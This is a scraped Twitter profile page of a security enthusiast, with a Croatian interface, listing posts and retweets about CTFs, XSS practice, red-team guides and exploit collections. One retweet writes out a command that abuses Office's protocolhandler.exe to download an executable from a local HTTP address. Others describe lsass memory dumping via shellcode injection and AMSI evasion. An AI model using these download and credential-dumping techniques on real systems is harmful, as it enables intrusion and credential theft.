haqpl

@haqpl

I’m a security enthusiast and technology polyglot, pug lover and drum’n’bass head.

Vrijeme pridruživanja: rujan 2009.

Tweetovi

Blokirali ste korisnika/cu @haqpl

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @haqpl

  1. Prikvačeni tweet
    3. sij
    Poništi
  2. proslijedio/la je Tweet
    1. velj

    Here is my massive lib db (for ctfs/wargames/blind pwns etc.). It consists of thousands of libs across over a dozen Linux distributions and architectures spanning the last 20 years. It indexes symbols & gadgets (including one gadgets AKA magic gadgets).

    Poništi
  3. 31. sij
    Poništi
  4. 31. sij
    Poništi
  5. 31. sij
    Poništi
  6. proslijedio/la je Tweet
    31. sij

    , , and I are starting a new security blog. In our first write-up, we will discuss the impact of "SameSite by default" and how it affects web app sec. Feel free to request future topics you would like us to cover.

    Poništi
  7. 31. sij

    Update: mission accomplished, shirt unlocked ;d

    Prikaži ovu nit
    Poništi
  8. 30. sij

    A whole day of solving 's XSS academy, status: 25 intended, 1 unintended, 2 left :) Great learning opportunity!

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    28. sij
    Poništi
  10. proslijedio/la je Tweet
    30. sij

    Just published a follow-up to my Adobe Reader symbols story on the Project Zero blog. Turns out there's even more debug metadata to be found in some old (and new) builds, including private CoolType symbols. Enjoy!

    Poništi
  11. proslijedio/la je Tweet
    29. sij

    Burp Suite Extender that try to find sub-domain, similar-domain and related-domain of an organization

    Poništi
  12. proslijedio/la je Tweet
    28. sij

    A Red Teamer’s Guide to GPOs and OUs

    Poništi
  13. proslijedio/la je Tweet
    28. sij

    (Ab)using Kerberos from Linux - OnSecurity

    Poništi
  14. proslijedio/la je Tweet
    27. sij

    If 's DotnetToJScript is blocked on newer versions of Windows or if it gets flagged by AMSI, you can use Excel automation via a COM object as an alternative to execute shellcode from JScript or VBScript w/o touching disk. PoC for x86 & x64 here:

    Poništi
  15. proslijedio/la je Tweet
    27. sij

    I created this repo for the people who want to learn about windows logical privilege escalation bugs. You can contact me to add good article which I missed.

    Poništi
  16. proslijedio/la je Tweet
    28. sij
    Poništi
  17. proslijedio/la je Tweet
    26. sij

    With much respect for the sleuthing and divination powers of our friends at MSPU and Techdows, we have no plans to add a "Legacy Edge Mode" to the new Microsoft Edge. The flags in these articles are just a feature used internally for testing. 😎

    Poništi
  18. proslijedio/la je Tweet
    26. sij
    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    22. sij

    ppldump : Injects MiniDumpWriteDump() Shellcode into PPL procs (lsass demo) to dump memory. Got better tools, so useless to me now. Note sometimes the threads lock after the APC is queued, causing MiniDumpWriteDump to fail. Just resume the thread(s)

    Poništi
  20. proslijedio/la je Tweet
    24. sij

    download via Binary .exe C:\[office installed folder]\root\[version]\ protocolhandler.exe "http://192.168.1.111/cmd.exe" cc

    Poništi
  21. proslijedio/la je Tweet
    20. sij

    Nice collection of chrome sandbox escape POCs/exploits and methodology, go check it out !

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·